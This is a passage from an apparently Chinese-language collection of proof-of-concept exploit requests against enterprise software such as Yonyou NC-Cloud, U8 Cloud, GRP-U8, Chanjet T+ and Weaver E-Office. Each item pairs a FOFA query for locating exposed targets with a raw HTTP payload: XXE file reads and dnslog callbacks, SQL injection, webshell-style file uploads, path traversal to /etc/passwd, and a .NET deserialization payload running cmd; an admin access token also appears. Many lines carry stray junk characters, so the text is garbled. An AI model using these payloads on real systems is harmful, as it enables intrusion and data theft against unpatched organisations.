User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
5 i1 K' N$ l2 o h$ n& t- o; M! DAccept-Encoding: gzip, deflate% u2 B; r8 x( `8 R/ e, U$ H6 t
Accept: */*& z" Q8 o3 H6 }4 T- l# `+ E3 ~
Connection: close4 g, l. ~+ E e2 B) y; \+ }+ U
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
* F/ F3 C& E3 g9 I8 DContent-Length: 190( x9 g* o$ d( _+ D+ `/ c- r- S
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df01 ]# I* e& O E0 a7 l6 d. J
% y% Y, m. b, J) M- n' t
--fd28cb44e829ed1c197ec3bc71748df0* j! i" Y; X: a
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"+ T' n( S3 a/ G: p3 w- ?; Q' x: a
. A8 p) m2 e" l' w8 l. N% P
<%out.println(1111*1111);%>% [% ^0 W/ t' s; I' C8 ^3 y
--fd28cb44e829ed1c197ec3bc71748df0--
8 W. Q% ?1 \! \" H: |# ^0 Q, [' }8 K- b/ X$ ]7 M; s9 P- H |
0 _% w9 @8 r1 T7 w4 V5 | [
36. 用友NC-Cloud soapFormat XXE
+ P1 a9 h$ ?- dFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 J3 q' A: e! q8 L* ~POST /uapws/soapFormat.ajax HTTP/1.1
* T& T# ]+ u7 s# i( B. zHost: 192.168.40.130:8989- r; t- r! E" K+ M" x. j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0; b3 I) m I/ {( b1 V( u
Content-Length: 263& @5 [/ q" C1 W" W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 d; W9 \7 I2 w) u! `
Accept-Encoding: gzip, deflate" K E1 A2 M+ X# H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. Z3 q) ?3 l% g" O
Connection: close
# r# b, J2 H& @" S1 RContent-Type: application/x-www-form-urlencoded0 a1 u2 ]0 \( |/ q
Upgrade-Insecure-Requests: 1
4 b8 {2 |6 s' v! ]
; k& g" J* O: O2 K/ W/ j7 b! Gmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
& a- i. C1 P: }+ o; p6 n8 K0 v8 Z) C$ w
6 A; Z; \& D8 c1 _( W
37. 用友NC-Cloud IUpdateService XXE
% T( h* n) k( f8 ^7 QFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- r; }! P; H( s$ }2 tPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1$ F3 A0 u& o! `+ z& C! l
Host: 192.168.40.130:8989; K* Z! F5 x, r' E5 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 P: ^2 `. a* pContent-Length: 421
) U% E- ~6 e5 e% O! Y8 R8 b5 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 O- K/ b4 A2 O! y1 Z, I" z
Accept-Encoding: gzip, deflate/ B2 z9 t2 E5 k+ h: ?+ k( [
Accept-Language: zh-CN,zh;q=0.92 N) Q! S8 g; d
Connection: close
# p s+ D K3 A' v, zContent-Type: text/xml;charset=UTF-8
, `. `0 ~3 _* f+ R3 ^5 ^SOAPAction: urn:getResult
7 [% @# [( V9 y% }! J+ gUpgrade-Insecure-Requests: 1
. T7 {, l+ x( G! Y) B# |
) a/ b0 O9 s0 ?6 N6 U<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
0 {$ Q1 J0 B: Z, c0 T0 c<soapenv:Header/>
8 R# t8 ~$ l7 L* d7 m5 {4 L3 m<soapenv:Body>
$ w; D" p: Y" A" d7 l0 f% N4 C<iup:getResult>$ L5 t i0 ^' v5 l# E) m W
<!--type: string-->7 M6 n9 o2 Y/ H0 m
<iup:string><![CDATA[
* n0 O& j* G1 S0 ^<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
( V- k) l/ O0 N! }5 W$ |% |: S" m<xxx/>]]></iup:string>
/ P0 E9 f! T! J</iup:getResult>: R2 m. v5 f1 K) A4 I) f
</soapenv:Body>1 B' v$ g1 b I: e- H; |
</soapenv:Envelope>
1 ^5 Y! W( y/ X1 Q' h7 Y& N. [: a# Z" |
1 D% [# f# n P% w) Y+ {' _$ f4 H' x U# R
38. 用友U8 Cloud smartweb2.RPC.d XXE
3 u7 G7 E) W$ |FOFA:app="用友-U8-Cloud"
1 R. P- L- w7 yPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 b0 ]7 h. t+ w6 F
Host: 192.168.40.131:8088
- v3 X' O% c; |9 j3 m, vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25# q& b7 a3 D3 z" v; B
Content-Length: 260
; |2 E2 X$ L3 w# U7 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
E! a& ~; E1 G/ g) iAccept-Encoding: gzip, deflate
[+ i9 H2 G/ U. |/ u; P# cAccept-Language: zh-CN,zh;q=0.9/ G. ^5 h( ^. j; ]
Connection: close
- x$ F* ]0 k$ [1 W* H* |" jContent-Type: application/x-www-form-urlencoded
' w8 e2 D& q/ B9 t2 x6 r* t7 p6 {' @
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
# s+ m- {; K$ W2 x0 C7 W3 _; M( D9 o/ @3 h* B' M
- }- p0 R8 n, D6 [% B9 F& X9 X39. 用友U8 Cloud RegisterServlet SQL注入
, y. C7 j4 F/ N; }9 sFOFA:title="u8c"
& W/ {- |) ~8 F+ x+ ~! HPOST /servlet/RegisterServlet HTTP/1.1! I4 b/ f6 R L; O. d8 c
Host: 192.168.86.128:80898 z! z) W# P4 G* q! A# |& M/ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
& l3 D: x$ {/ ~# n( Z" zConnection: close
2 [+ W% F" I" r/ E8 m- W* [Content-Length: 85
6 Z' P# G* X+ X- V- } I D cAccept: */*& W8 n: V( S$ S2 i0 J4 `& i2 G
Accept-Language: en
4 }, ^* l; Z3 x0 E$ Q+ `) TContent-Type: application/x-www-form-urlencoded
" z# {0 l3 G' i, H SX-Forwarded-For: 127.0.0.1+ J' K ?5 s% X ^
Accept-Encoding: gzip
3 q+ r% }9 g! [+ n. J8 a P3 G+ s; }% x9 u! G! l/ M
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
3 Q7 n# ]5 A! n9 B2 p
" I, ^# G" R2 {6 `) i7 F9 `0 @/ K6 {% o$ p, S
40. 用友U8-Cloud XChangeServlet XXE
6 f$ j' [/ e6 q4 i# f+ DFOFA:app="用友-U8-Cloud": V G l2 f) A) b& k; I& s0 R; d' c
POST /service/XChangeServlet HTTP/1.16 _ \+ H, b& ^. l2 e3 f7 w
Host: x.x.x.x' s3 _6 Y" I- T
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 N) T t. @6 _/ t- Y U
Content-Type: text/xml: G) h* t# q; |9 g3 X
Connection: close7 B# {0 h3 {1 ~* t6 P+ x/ m
' [6 p X% s+ W2 U5 c<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
. Q9 I. h" Z& A" y" L+ F
8 L0 H7 ` R4 S" w% d$ B
2 d# ?0 R: G; ]% f; v41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 r. d1 r0 N/ E7 j0 P8 ?
FOFA:app="用友-U8-Cloud"
3 w0 h5 }* L8 {0 G" @* q, [5 H3 aGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
8 z5 [2 O! D# ~ I, g7 l* cHost:
: _+ S P/ ~2 Y8 X/ G: SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& [' d& t) o1 Y. ?0 c
Content-Type: application/json1 C0 ] r( Z& K$ {
Accept-Encoding: gzip
9 s6 R1 e$ ]0 E8 K! zConnection: close
2 s' a9 s& u) |7 c9 L# R% Q: `( | S2 U& c/ ?
9 o2 V0 ~# W5 m
42. 用友GRP-U8 SmartUpload01 文件上传1 u$ c h. b/ G& ?# G Z
FOFA:app="用友-GRP-U8"
; B" i+ p" V6 aPOST /u8qx/SmartUpload01.jsp HTTP/1.1
# T- S) C; l* g$ }& j* j* hHost: x.x.x.x
3 r% ~4 X" X- s% L. f1 h) kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
" z% j" Y" o* T* H. oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36/ ?' ~& H' v3 `0 c1 ]( Z( r. o+ ]
. `4 a7 H/ e. K. dPAYLOAD
0 d- [0 s; i9 t- M/ x2 `1 A) P
6 ~- x( ?/ d3 W$ O
8 `* R& ~7 `( j1 Vhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml! I: d+ K3 v2 u& ]0 D l" S0 e3 Y* w
# _! K! u6 P5 Q }
43. 用友GRP-U8 userInfoWeb SQL注入致RCE0 P4 o+ p* y0 A! P+ k3 O- R2 \" M3 }
FOFA:app="用友-GRP-U8"
5 p7 ]4 M8 f" d3 q, c$ ]2 UPOST /services/userInfoWeb HTTP/1.1
1 q0 z: V$ B. v B- d3 m* _$ CHost: your-ip
& B1 q& g8 G% d! Y; sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 x0 @( l0 W$ H' XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; w/ {/ ?3 `3 p, `% K/ x* T* j, v' ~
Accept-Encoding: gzip, deflate
# ~" I+ S; S1 U WAccept-Language: zh-CN,zh;q=0.9' b9 p" v8 ]" B$ Q8 h) ^
Connection: close9 X* e. r8 i1 I. y; |9 ?
SOAPAction:
/ v) v! c3 `' H4 i0 L b7 X1 a+ jContent-Type: text/xml;charset=UTF-86 j* V1 m& ]; z" A; G
8 Y; E" O: E6 d' K, A. A4 m7 R1 z<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">% \7 o' k0 q" o: o9 d5 ]
<soapenv:Header/>- _# a* M% i4 Q, u
<soapenv:Body>9 U& z' L+ E% ~9 h! z4 `
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">) ~5 L; ^0 W: f* _1 z) v- a
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>$ R Q5 C- Y/ F2 B5 q: Y0 |
</ser:getUserNameById>! Q: s$ r$ Y& q y" ~! C
</soapenv:Body>3 k8 [! [; O) F l. ~% X/ o. b
</soapenv:Envelope>; y7 B. O5 @5 p4 x* v! S B
' y; L* |; P" x2 y' a* O- \; g7 O) N/ \! U0 e1 }! V+ t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 T+ n* {% K% f" z; F9 GFOFA:app="用友-GRP-U8"
9 l9 u+ w( t( PGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1. O1 e# P/ l3 ^
Host: your-ip
3 d6 s7 s6 K4 r4 c, ]; {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
6 X N+ {/ ^- N" DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* X; ^) ~# b, X* m; c% `Accept-Encoding: gzip, deflate
9 ]# l4 D( T( k% w- tAccept-Language: zh-CN,zh;q=0.9
; E$ Z% K7 N( gConnection: close' |* l9 c4 r8 ?5 L/ J0 y
' r6 j" A* i( j6 ^4 J) E; m0 _5 i# F+ F& f& \& }; T0 ?6 q6 a
45. 用友GRP-U8 ufgovbank XXE4 p5 C1 L' i# d" S
FOFA:app="用友-GRP-U8"
$ C) W9 ]" O: I# FPOST /ufgovbank HTTP/1.1
$ e% F0 a `6 E' a5 X" qHost: 192.168.40.130:222
- R- I' n) [6 T9 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
* l4 n. M: t. P4 {- C9 m9 mConnection: close5 B# A$ R: g4 k, v, t6 y" N$ t
Content-Length: 161# D" P/ e$ e f, ~1 C# F& A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 J# W5 X* }6 f' |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ]# H! t5 j8 j3 N* PContent-Type: application/x-www-form-urlencoded
* s: T' Y: S9 E% U: YAccept-Encoding: gzip- h% H# O! h! r) O' x& J
$ S2 j( _. K9 @' |& C D) n
reqData=<?xml version="1.0"?># W& G( c% v- G, [6 [
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
* d& s+ Q! `) D$ w. C7 k% x- b: z! H
( h; g2 P* q1 ?) n" ?, F
, `! y5 p/ R" B# D* \# o46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 i& H/ X; P7 V5 Y* {FOFA:app="用友-GRP-U8"7 e& w- b( a Z( N& C
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.16 @; V/ O) q2 Q1 a
Host: your-ip' v, K7 N# s3 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.366 m9 v v7 n! n5 Y j( m: E- @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 I( [" y( X' A/ I7 g' y: ^
Accept-Encoding: gzip, deflate* d1 M }! B2 M
Accept-Language: zh-CN,zh;q=0.9
/ `: B$ x% Q+ l, X. S- r# lConnection: close
4 }$ a; u- | M' s
3 g z D; G$ J
2 G0 V$ P# L, ?: ]# e6 W( ^47. 用友GRP A++Cloud 政府财务云 任意文件读取
5 J7 _7 @+ S& H- _2 u5 h" N {; [FOFA:body="/pf/portal/login/css/fonts/style.css"
$ h, x" H9 Z0 b& f, rGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" c2 ? D; S4 l$ n" JHost: x.x.x.x/ g8 @% B4 J5 U" i* n7 s5 \
Cache-Control: max-age=0
# U5 o; \$ I4 Y1 ? RUpgrade-Insecure-Requests: 1
! K1 a* z ?( c" M( }; X. FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 X1 O% Z. r) ?& I& x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ~: @/ l c4 t# ^$ pAccept-Encoding: gzip, deflate, br
8 J2 I5 F8 ^/ c8 a& CAccept-Language: zh-CN,zh;q=0.96 a2 {! ]0 X( q9 j) z2 z3 w" b
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT; ^4 ?' X; S+ L: q3 G1 u1 d0 E! Z
Connection: close/ b4 b m; ]# k1 Z# E. R
! y+ g( s4 L4 R1 Y* E2 O7 G3 f% ~9 m2 Q! S# A" m) c
& k. u5 n; y( h$ g5 I48. 用友U8 CRM swfupload 任意文件上传
: Q- [! R: f4 W" hFOFA:title="用友U8CRM"
% R% h; ]7 [, p% YPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
. D+ L V" ^" z: {3 M1 hHost: your-ip1 D/ D) r+ h: |, F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% @/ f8 X- X9 l9 m" x1 q' J/ g fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" T4 i r7 V" C; P. fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ]: |) d5 k5 T! C* R* K) Z
Accept-Encoding: gzip, deflate
* n: W) W- k" ~4 L) g* @Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
) ?: O* C: }+ p% \5 I' O4 T------2695209672394068716424300668556 m! e* [' p" u# J6 V( L
Content-Disposition: form-data; name="file"; filename="s.php"( {# X/ V- W( I1 W- L' j- `4 k
1231
8 t) A K# |# K+ p/ |Content-Type: application/octet-stream" \/ N( S2 J# A# S U b4 ~
------269520967239406871642430066855
0 n1 p& w8 H+ Z! uContent-Disposition: form-data; name="upload"
4 `# b' a; G- D+ u, Q0 Hupload
1 g5 x; a7 F' O4 ~- W# p------269520967239406871642430066855--1 r+ N% m# q7 T% ^# c. F
9 O9 `! p- r6 [. ?
4 b& c# p) `! {/ C49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# i% P4 n C7 C3 ~. s/ B9 P( T+ WFOFA:body="用友U8CRM"
- H8 ~) G' `- N1 S+ w; r% m4 x0 b5 g+ J, c* R, _8 Y
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
; D" {2 Q4 j3 C/ M+ wHost: x.x.x.x& f1 k# U6 a1 g9 e" ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: O& |! ~' e3 b# p, J6 V, qContent-Length: 329
* M' P+ k4 i9 S# k+ D b; L' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 Q U: Q" S: K1 Y" f( D/ B" z$ jAccept-Encoding: gzip, deflate
0 i$ }: s3 X; N H' I. R1 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 C9 R# Q7 ~# h1 w* Y+ i U' j: a+ fConnection: close
3 w" \- @7 ]! t8 q8 G6 jContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
5 ]8 f6 b% k& z5 J, A l: D8 h9 C4 a1 M6 B3 U
-----------------------------vvv3wdayqv3yppdxvn3w
/ `, G! I# m2 \4 ~& kContent-Disposition: form-data; name="file"; filename="%s.php "
4 Z- L; C! o. zContent-Type: application/octet-stream, }! n. s0 D/ u" Q5 I V# U( H
8 s" r, D# o$ A4 V) S2 H0 j# }wersqqmlumloqa
2 X. p* R o& r5 |* H+ {-----------------------------vvv3wdayqv3yppdxvn3w3 R# ~5 p0 o8 }% V. w% P6 _; ?
Content-Disposition: form-data; name="upload"
& r& ?( @1 F3 e( E/ r# z
% t/ L3 }+ D- h: d) Uupload
2 y7 {% e- v1 T, `* s5 ]: E# q; Q-----------------------------vvv3wdayqv3yppdxvn3w--
, l& a' g8 i4 j g, v3 H; p
" g+ B5 n; G, {* i! L. r
2 q/ R% G2 N3 V0 T, b' ahttp://x.x.x.x/tmpfile/updB3CB.tmp.php
( A8 S" Q. |3 y5 T6 x/ p- T' S! h- k8 [0 z9 ?4 Y
50. QDocs Smart School 6.4.1 filterRecords SQL注入
1 Q A, A5 q( [2 X- n! KFOFA:body="close closebtnmodal"
7 M+ t4 Z$ m1 q% i5 [8 zPOST /course/filterRecords/ HTTP/1.1
9 X( l2 L3 a" a- d* [$ rHost: x.x.x.x% n9 {/ ?: G1 Z v% l; M) _
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) E f" M7 Q, p. D' @' cConnection: close' g6 n& y2 O) Z6 x: i. e$ z7 u
Content-Length: 224: f+ `/ e$ @( W& T
Accept: */*6 f: C! r1 I1 X- {6 j
Accept-Language: en
0 ^+ i+ c8 p' EContent-Type: application/x-www-form-urlencoded
! \' p) w" D+ t, J1 v9 ~; EAccept-Encoding: gzip! G+ I; _, ^4 o _& V+ e
% n! |: F& m6 P0 f8 q' v
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
$ B6 e3 {- t! a% [* f
2 q9 g$ D( V+ a9 ]0 y+ m! W8 Y( V2 I
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 E% m& l# o! k+ c" s0 B4 j
FOFA:app="云时空社会化商业ERP系统"
7 [0 P) G Q9 Z. l3 T4 LGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 M! ?5 {" }8 F0 q. [: uHost: your-ip
4 c) P0 m/ [; Q3 r. SUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
% z. i; o C& k' i' dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! _0 i* M/ l0 S& IAccept-Encoding: gzip, deflate( P# F% z6 X; m+ J4 p$ X* q
Accept-Language: zh-CN,zh;q=0.9( _7 J! ?* _7 a3 i
Connection: close* n* U7 O% w. j7 A) D
. G6 a" u" K+ l1 K6 z7 k$ o
. C6 [8 v4 b! N/ F [% t52. 泛微E-Office json_common.php sql注入1 }, d: V" A7 X$ B
FOFA:app="泛微-EOffice" S8 @7 ~1 ^! @2 [3 Q; z' r
POST /building/json_common.php HTTP/1.1
* [1 I; x% w1 YHost: 192.168.86.128:80975 C: z& }5 _; v2 V r3 f. M
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( |! ?$ Y! s- @9 G: q* Y, w' _
Connection: close
. ^& ?1 r% F9 G( v! eContent-Length: 87
+ R6 v& T2 H$ ? Y d) M" u7 N0 ?Accept: */*$ u* X0 ?$ G+ L0 x
Accept-Language: en
9 n& U2 g& h `/ L, I: C6 hContent-Type: application/x-www-form-urlencoded
+ n9 S" Z- c F% t& ?Accept-Encoding: gzip( _3 U$ I ~3 Q. d
( w6 g% N* i7 n$ M! N! f( Etfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
@- @ Y0 v) j: p. R
. p. Y; w- s! P4 d% h n: {* g6 ^/ N2 a5 f
53. 迪普 DPTech VPN Service 任意文件上传
, L8 H* E; S7 C, z# I/ |FOFA:app="DPtech-SSLVPN"0 \ t F0 |2 l% m* Q
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd5 @& I6 P% O9 v _) v
% w! ]0 K8 }- B8 M/ o1 A7 M
* n0 j% X0 G9 H- Y7 e54. 畅捷通T+ getstorewarehousebystore 远程代码执行! P4 d% g5 b5 g4 Z( H6 X6 B) L
FOFA:app="畅捷通-TPlus"3 O: O; V6 k( c7 k/ X, q" D
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件; A4 G, R' \5 d$ o
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"9 a8 f" ~) ]4 C4 n3 w0 ?, K
; o, ]* H; M5 K4 P3 i2 j7 t# `# ~- h
完整数据包
* j" L" F3 j3 L, G$ w/ n; xPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& P: H5 N: U: G+ CHost: x.x.x.x
' c5 z% t' n+ {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F% u+ q/ a% Y# F3 }1 E* p7 x
Content-Length: 593
' T9 n8 F$ ]" |! {& N/ z/ `! G7 Z" f9 t" G" i* r0 j; C7 q$ b6 |$ U
{
+ Z" C, e$ F4 |3 b7 a7 Y" J1 H"storeID":{
4 |+ G& [1 A/ @5 s: B; [$ q6 n G "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* P4 B8 A O% L0 { U
"MethodName":"Start",3 m9 ?# _9 r$ N2 c
"ObjectInstance":{( \! V+ g4 m/ \$ U6 e% R' p5 k
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 b" U( Y! G) Q3 U9 A7 v
"StartInfo":{
+ G' W5 A2 L0 L' ^; f$ u5 Z "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* W6 f( G# H e: ]8 A+ T% { "FileName":"cmd",3 I1 S6 Y% R% S9 v$ ^. o
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. h8 N9 f: E n2 M }
9 O V3 g# b& J }
7 ?4 B( g R V) j2 m; @) E }
) w3 Z5 K6 x" H6 q9 t6 l4 K m}
5 Y" i3 U/ M6 [% v$ v4 D% h2 ]+ }
- m# c7 C9 F, ?5 p. |, |/ i: d6 N) _5 Z/ O: B/ w/ T
第二步,访问如下url% _/ \9 j3 F% Z
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
2 Q! a: z" d' y% e: E4 g5 x! q6 A) w' f2 E8 I
- V1 t2 B- m u7 }0 a ?0 ~
55. 畅捷通T+ getdecallusers信息泄露
a0 G: C" w" q$ p4 n2 tFOFA:app="畅捷通-TPlus"
# _ o5 Z7 M) I第一步,通过
% N! V2 e9 @2 D/ i1 s+ c6 E/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie+ h, v1 K* w7 ?# X2 ^) y* a3 Y& x" D
第二步,利用获取到的Cookie请求9 f, K* P) E V1 F5 T1 s
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
) X" y+ |; w& _/ h: Q; |7 ?. g; m, V6 }! f
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
6 b; l, v+ `, n8 KFOFA: app="畅捷通-TPlus"3 a( R9 O% ]4 j; x3 ^3 g
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1& N6 `* Z3 ? U" F
Host: x.x.x.x! A3 ^& e6 @' n3 B4 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ j8 B6 X% V; i: ? v$ ] ]Content-Type: application/json6 }5 I4 \$ D) d4 b; R/ ^
